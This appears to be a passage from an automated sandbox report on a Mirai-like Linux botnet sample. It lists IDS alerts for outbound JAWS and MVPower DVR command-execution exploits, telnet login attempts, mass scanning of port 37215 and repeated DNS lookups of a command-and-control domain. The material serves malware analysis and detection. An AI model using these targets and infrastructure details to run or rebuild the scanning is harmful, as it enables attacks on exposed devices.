Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:39768 -> 212.95.138.97:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:37380 -> 134.236.54.182:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:45320 -> 41.239.209.160:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:36114 -> 184.31.23.224:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:58934 -> 14.45.110.129:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:34638 -> 121.134.48.196:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:32964 -> 184.86.170.86:80
Source: Traffic Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:45320 -> 41.239.209.160:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:57028 -> 104.116.220.174:80
Source: Traffic Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 184.31.23.224:80 -> 192.168.2.23:36114
Source: Traffic Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:36114 -> 184.31.23.224:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:42206 -> 192.155.165.37:80
Source: Traffic Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:37380 -> 134.236.54.182:80
Source: Traffic Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 184.86.170.86:80 -> 192.168.2.23:32964
Source: Traffic Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:32964 -> 184.86.170.86:80
Source: Traffic Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:58934 -> 14.45.110.129:80
Source: Traffic Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:42206 -> 192.155.165.37:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:58700 -> 153.188.113.34:80
Source: Traffic Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 104.116.220.174:80 -> 192.168.2.23:57028
Source: Traffic Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:57028 -> 104.116.220.174:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:44024 -> 195.201.107.244:80
Source: Traffic Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:44024 -> 195.201.107.244:80
Source: Traffic Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:58700 -> 153.188.113.34:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:34972 -> 85.214.192.8:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:35104 -> 87.88.218.187:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:41316 -> 54.195.18.149:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:36560 -> 18.190.32.179:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:57562 -> 104.64.85.230:80
Source: Traffic Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:36560 -> 18.190.32.179:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:49380 -> 23.36.24.242:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:46736 -> 138.68.57.220:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:41438 -> 168.76.119.157:80
Source: Traffic Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.36.24.242:80 -> 192.168.2.23:49380
Source: Traffic Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 104.64.85.230:80 -> 192.168.2.23:57562
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:42524 -> 116.80.104.103:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:51994 -> 207.148.75.30:80
Source: Traffic Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:51994 -> 207.148.75.30:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:41694 -> 46.161.12.48:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:59598 -> 88.221.132.202:80
Source: Traffic Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 88.221.132.202:80 -> 192.168.2.23:59598
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:48614 -> 45.39.169.26:80
Source: Traffic Snort IDS: 1251 INFO TELNET Bad Login 211.231.7.229:23 -> 192.168.2.23:60550
Source: Traffic Snort IDS: 718 INFO TELNET login incorrect 211.231.7.229:23 -> 192.168.2.23:60550
Source: Traffic Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:48614 -> 45.39.169.26:80
Source: Traffic Snort IDS: 2023435 ET TROJAN Possible Linux.Mirai Login Attempt (888888) 192.168.2.23:35220 -> 43.252.199.80:23
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:40814 -> 107.164.149.204:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:39600 -> 68.39.223.213:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:36838 -> 58.229.240.213:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:54172 -> 104.94.8.233:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:59724 -> 212.112.133.41:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:35328 -> 115.42.27.195:80
Source: Traffic Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:40814 -> 107.164.149.204:80
Source: Traffic Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 104.94.8.233:80 -> 192.168.2.23:54172
Source: Traffic Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:39600 -> 68.39.223.213:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:47228 -> 34.228.109.46:80
Source: Traffic Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:47228 -> 34.228.109.46:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:33714 -> 42.118.220.136:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:42822 -> 61.0.155.247:80
Source: Traffic Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:42822 -> 61.0.155.247:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:52014 -> 209.182.101.171:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:36618 -> 13.111.134.223:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:53306 -> 35.239.203.36:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:51846 -> 184.154.49.82:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:52118 -> 181.214.78.141:80
Source: Traffic Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:51846 -> 184.154.49.82:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:51220 -> 213.225.239.196:80
Source: Traffic Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:52118 -> 181.214.78.141:80
Source: Traffic Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:51220 -> 213.225.239.196:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:37654 -> 138.123.24.112:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:49138 -> 104.216.48.158:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:55650 -> 77.51.192.251:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:59178 -> 102.221.92.210:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:38338 -> 45.150.172.55:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:36014 -> 1.242.230.196:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:60700 -> 172.121.186.144:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:54872 -> 23.223.152.126:80
Source: Traffic Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:59178 -> 102.221.92.210:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:43986 -> 69.192.1.50:80
Source: Traffic Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:60700 -> 172.121.186.144:80
Source: Traffic Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.223.152.126:80 -> 192.168.2.23:54872
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:48802 -> 158.199.238.109:80
Source: Traffic Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:36014 -> 1.242.230.196:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:58036 -> 186.139.109.120:80
Source: Traffic Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 69.192.1.50:80 -> 192.168.2.23:43986
Uses known network protocols on non-standard ports
Source: unknown Network traffic detected: HTTP traffic on port 41612 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 41612 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 41612 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 37924 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 53452 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 52114 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 53452 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 41612 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 37924 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 53452 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 53452 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 41612 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 37924 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 53452 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 37924 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 41612 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 53452 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 44352 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 37924 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 41612 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 37090 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 53452 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 55556 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 55556 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 55556 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 55556 -> 37215
Performs DNS queries to domains with low reputation
Source: DNS query: cnc.luxstresser.xyz
Source: DNS query: cnc.luxstresser.xyz
Source: DNS query: cnc.luxstresser.xyz
Source: DNS query: cnc.luxstresser.xyz
Source: DNS query: cnc.luxstresser.xyz
Source: DNS query: cnc.luxstresser.xyz
Source: DNS query: cnc.luxstresser.xyz
Source: DNS query: cnc.luxstresser.xyz
Source: DNS query: cnc.luxstresser.xyz
Source: DNS query: cnc.luxstresser.xyz
Source: DNS query: cnc.luxstresser.xyz
Source: DNS query: cnc.luxstresser.xyz
Source: DNS query: cnc.luxstresser.xyz
Source: DNS query: cnc.luxstresser.xyz
Source: DNS query: cnc.luxstresser.xyz
Source: DNS query: cnc.luxstresser.xyz
Source: DNS query: cnc.luxstresser.xyz
Source: DNS query: cnc.luxstresser.xyz
Source: DNS query: cnc.luxstresser.xyz
Source: DNS query: cnc.luxstresser.xyz
Source: DNS query: cnc.luxstresser.xyz
Source: DNS query: cnc.luxstresser.xyz
Source: DNS query: cnc.luxstresser.xyz
Source: DNS query: cnc.luxstresser.xyz
Source: DNS query: cnc.luxstresser.xyz
Source: DNS query: cnc.luxstresser.xyz
Source: DNS query: cnc.luxstresser.xyz
Source: DNS query: cnc.luxstresser.xyz
Source: DNS query: cnc.luxstresser.xyz
Source: DNS query: cnc.luxstresser.xyz
Source: DNS query: cnc.luxstresser.xyz
Source: DNS query: cnc.luxstresser.xyz
Source: DNS query: cnc.luxstresser.xyz
Source: DNS query: cnc.luxstresser.xyz
Source: DNS query: cnc.luxstresser.xyz
Source: DNS query: cnc.luxstresser.xyz
Source: DNS query: cnc.luxstresser.xyz
Source: DNS query: cnc.luxstresser.xyz
Source: DNS query: cnc.luxstresser.xyz
Source: DNS query: cnc.luxstresser.xyz
Source: DNS query: cnc.luxstresser.xyz
Source: DNS query: cnc.luxstresser.xyz
Source: DNS query: cnc.luxstresser.xyz
Source: DNS query: cnc.luxstresser.xyz
Source: DNS query: cnc.luxstresser.xyz
Source: DNS query: cnc.luxstresser.xyz
Source: DNS query: cnc.luxstresser.xyz
Source: DNS query: cnc.luxstresser.xyz
Source: DNS query: cnc.luxstresser.xyz
Source: DNS query: cnc.luxstresser.xyz
Source: DNS query: cnc.luxstresser.xyz
Source: DNS query: cnc.luxstresser.xyz
Source: DNS query: cnc.luxstresser.xyz
Source: DNS query: cnc.luxstresser.xyz
Source: DNS query: cnc.luxstresser.xyz
Source: DNS query: cnc.luxstresser.xyz
Source: DNS query: cnc.luxstresser.xyz
Source: DNS query: cnc.luxstresser.xyz
Source: DNS query: cnc.luxstresser.xyz
Source: DNS query: cnc.luxstresser.xyz
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 197.84.22.146:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 156.134.197.202:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 41.81.76.13:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 197.55.245.147:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 197.88.62.50:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 197.21.39.98:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 197.252.252.146:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 156.253.225.152:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 156.41.240.94:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 197.171.251.181:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 197.216.231.125:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 41.12.225.175:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 41.23.167.235:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 197.12.83.44:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 41.65.0.176:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 197.195.132.226:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 156.211.253.34:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 156.9.210.111:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 197.193.74.209:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 197.66.6.234:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 41.48.109.176:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 41.132.247.18:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 156.30.77.80:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 156.57.54.148:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 41.102.157.220:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 197.6.247.160:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 41.184.102.141:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 197.15.125.99:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 41.145.74.155:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 197.69.187.84:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 156.38.4.187:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 41.188.190.29:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 156.146.44.52:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 156.245.180.211:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 41.165.149.126:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 156.212.197.58:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 197.35.214.180:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 197.20.183.91:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 197.129.214.30:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 197.11.184.105:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 156.70.54.198:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 156.149.50.143:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 41.85.55.185:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 156.180.216.133:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 41.60.153.27:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 197.101.20.91:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 41.177.161.210:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 41.89.128.76:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 41.30.189.84:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 41.71.71.135:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 197.140.229.111:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 41.179.149.70:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 197.182.59.102:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 41.95.225.189:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 156.67.109.163:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 156.107.123.17:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 41.36.75.237:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 197.139.71.224:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 41.159.124.224:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 197.180.199.74:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 156.100.212.109:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 156.189.81.175:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 41.93.14.88:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 156.166.233.90:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 41.151.148.238:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 41.242.96.59:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 197.130.234.77:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 156.111.222.17:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 197.212.47.136:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 156.181.114.159:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 41.5.250.77:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 156.216.129.6:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 156.248.243.44:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 156.141.60.239:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 41.130.134.35:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 156.65.147.2:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 41.145.203.172:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 41.151.74.201:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 156.157.227.255:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 197.153.140.209:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 156.26.79.5:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 41.22.150.59:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 41.125.247.67:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 156.49.21.183:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 41.207.19.249:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 156.17.48.219:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 41.185.107.140:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 41.176.4.149:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 197.88.57.193:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 156.12.255.96:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 156.33.228.8:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 41.102.71.8:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 156.136.2.60:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 156.40.181.129:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 197.140.180.15:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 197.216.123.106:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 156.191.234.252:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 197.191.132.224:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 156.219.1.143:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 41.195.153.46:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 197.47.51.2:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 156.33.22.94:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 41.247.233.52:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 41.116.110.133:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 156.251.34.153:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 197.77.79.255:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 156.145.164.32:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 156.51.57.71:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 41.58.66.232:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 197.98.152.26:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 41.10.22.244:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 41.104.126.63:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 41.115.181.141:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 41.16.225.39:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 197.172.142.99:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 41.200.238.166:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 197.172.91.91:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 156.154.128.238:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 197.5.6.167:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 197.146.26.143:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 41.41.80.202:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 197.144.193.99:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 156.200.0.211:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 41.55.179.154:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 156.211.47.27:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 156.144.89.111:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 156.210.140.35:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 41.11.144.46:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 197.145.152.230:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 156.89.158.172:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 156.151.208.133:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 197.201.254.8:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 41.59.39.118:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 156.43.196.138:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 41.202.161.238:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 41.235.32.254:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 156.204.159.145:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 41.52.243.86:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 197.139.247.68:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 41.12.190.104:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 41.132.65.9:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 156.110.28.194:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 197.7.105.245:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 41.234.170.68:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 156.159.116.30:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 41.78.136.189:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 156.222.234.183:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 197.210.34.189:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 197.99.126.210:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 41.140.196.132:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 156.1.151.203:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 156.47.142.185:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 156.248.145.163:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 41.22.123.44:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 41.48.12.38:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 197.132.111.173:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 156.62.117.220:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 41.204.232.237:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 197.222.121.24:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 41.43.227.250:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 197.28.50.178:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 41.253.30.63:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 41.123.186.153:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 41.227.228.83:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 197.247.251.155:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 197.72.213.36:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 41.177.96.111:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 156.136.13.160:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 197.84.162.58:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 197.242.152.243:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 197.64.114.61:37215
Source: global traffic TCP traffic: 192.168.2.23:52557 -> 41.68.213.163:37215
